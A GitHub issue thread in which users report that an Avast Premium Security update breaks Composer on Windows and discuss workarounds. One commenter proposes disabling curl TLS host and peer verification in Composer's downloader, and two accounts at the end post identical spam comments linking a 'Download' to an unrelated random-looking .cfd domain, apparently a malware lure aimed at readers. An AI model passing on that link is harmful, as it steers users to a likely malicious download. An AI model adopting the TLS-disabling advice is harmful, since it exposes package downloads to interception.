### ISSUE TITLE
Avast premium securitz prevents composer working

### ISSUE THREAD

**Issue by wonderfulsnaps** [composer/composer#12098]
Hello everyone,
I was using composer v. 2.7.8 without any issues until 18.08.2024. 
After Avast Premium Security was updated I am unable to run any composer command.
Composer itself can be run, however, when I use composer update or composer status or compose diagnose I end up in the errors.
As soon as I uninstall Avast all works fine. I was trying to enable exceptions in Avast according their help ’https://support.avast.com/cs-cz/article/antivirus-scan-exclusions/#pc’ for composer installed at C:\Users\<user>\AppData\Local\Composer
Does someone have the same issue work with composer on win11 with Avast premium security installed?
It is not very comfortable to uninstall and install antivirus whenever I need to use composer.

**Comment by herndlm** [comment]
https://github.com/composer/composer/issues/11503#issuecomment-2323515467 was just recently reported as well. Not sure if that helps or what exceptions in particular you're getting.

**Comment by Seldaek** [comment]
Yeah this is something we cannot do much about.. Report to Avast or disable it.

**Comment by kaltu** [comment]
As I mentioned in https://github.com/composer/composer/issues/11503#issuecomment-2195167606
MitM firewalls shouldn't be a problem if Composer correctly respects settings/options that explicitly disable SSL checks.

Is it possible for the Composer team to set up a testcase that when a MitM firewall such as Avast is running and Composer is configured to ignore SSL checks, Composer should be able to function without problem?

**Comment by Seldaek** [comment]
@kaltu ok that could be an option perhaps but how do we detect this setting/option?

**Comment by jeffwindhorst** [comment]
I was able to get past this issue by right clicking on Avast Premium Security in the system tray and setting shield to disabled for 10 minutes.

**Comment by kaltu** [comment]
> [@kaltu](https://github.com/kaltu) ok that could be an option perhaps but how do we detect this setting/option?

Sorry for the months-late reply
I mentioned the possible detection method in my linked comment. It's like the following.

I am not an active maintainer of this repo but I feel it's a bug that the `initDownload` function in the class `CurlDownloader`
https://github.com/composer/composer/blob/0e7d5199581bebe8a078dadb2805fb82bd6f4645/src/Composer/Util/Http/CurlDownloader.php#L162
where it doesn't take into account whether the user intends to disable SSL for curl.

It's understandable for Composer not to read `.curlrc` or other config files, but it's definitely unexpected when it also doesn't care if Composer's own flags like `disable-tls` is `true` and/or `secure-http` is `false`.

Specifically 
```
composer config --global disable-tls true
composer config --global secure-http false
```
has no effects on `CurlDownloader`

The function could add things like
```
curl_setopt($curlHandle , CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curlHandle , CURLOPT_SSL_VERIFYPEER, 0);
```
if it detects the flags mentioned above.

I am not able to create a pr for this, so I have to rely on active maintainers more familiar with the repo to look into the issue.

**Comment by baghihi** [comment]
# [Avast premium security prevents composer Download](https://rfsjh070725nwj.cfd/?p=553&pg=0&f=Download)

**Comment by zahrakhan18040** [comment]
# [Avast premium security prevents composer Download](https://rfsjh070725nwj.cfd/?p=553&pg=0&f=Download)
